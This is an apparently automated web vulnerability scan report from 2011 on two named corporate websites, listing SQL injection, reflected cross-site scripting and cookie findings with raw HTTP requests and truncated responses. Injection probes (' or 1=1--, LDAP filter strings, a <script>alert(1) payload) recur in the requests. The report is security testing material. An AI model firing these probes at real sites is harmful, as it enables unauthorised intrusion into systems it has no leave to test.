1.1. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]
1.2. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]
1.3. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]
1.4. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]
1.5. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]
1.6. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]
3. Cross-site scripting (reflected)
3.1. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]
3.2. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]
4. Cookie without HttpOnly flag set
4.1. http://www.dominionenterprises.com/main/do/Advertiser_Agreement
4.2. http://www.dominionenterprises.com/main/do/Careers
4.3. http://www.dhmiservices.com/ClickContact/js.ashx
4.4. http://www.dhmiservices.com/ImageHandler.ashx
4.5. http://www.dhmiservices.com/favicon.ico
6.1. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js
6.2. http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js
6.3. http://www.dominionenterprises.com/site/scripts/s_code.js
7. Content type incorrectly stated
7.1. http://www.dhmiservices.com/ClickContact/js.ashx
7.2. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=bdf614ab37 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e7b89d9d22 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=17226455681 |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=dba9e76780 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=a6085532e06 Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=6fbc3a6086 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers72254876'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ad448786cf Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Careers72254876'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:43 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=7498864a68 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:43 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=50020d3c5d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=46792d7b37b Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:29 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=f73a685d8d Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:29 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e2553f7484 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=1e404d82997 Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o ...[SNIP]... |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:07 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ecde5f56d9 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:07 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Careers"> <meta name="keywords" content="Careers"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/For_Businesses |
GET /main/do/For_Businesses16640137'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/For_Businesses16640137'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses48717636'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32718 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/businesses48717636'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/*)(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:26 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ec8318b7ec Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:26 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=3889173c833 |
GET /main/do/*)!(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:27 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=fbdf302905 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:27 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ClickContact/js.ashx |
GET /ClickContact/js.ashx Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 653 Set-Cookie: BIGipServerdhmweb_http function load2058797069() { var load = window.open('http:/ ...[SNIP]... <img src=\"http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ImageHandler.ashx |
GET /ImageHandler.ashx?img_id Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 118 Set-Cookie: BIGipServerdhmweb_http Conversion failed when converting the nvarchar value '3824e1fbf<script>alert(1)< |
Severity: | High |
Confidence: | Firm |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses/id/13 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:40:19 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:40:19 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 23191 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Businesses</title> <base href="http://www <meta http-equi ...[SNIP]... <div class="secondary_nav_item ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses/id/13 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
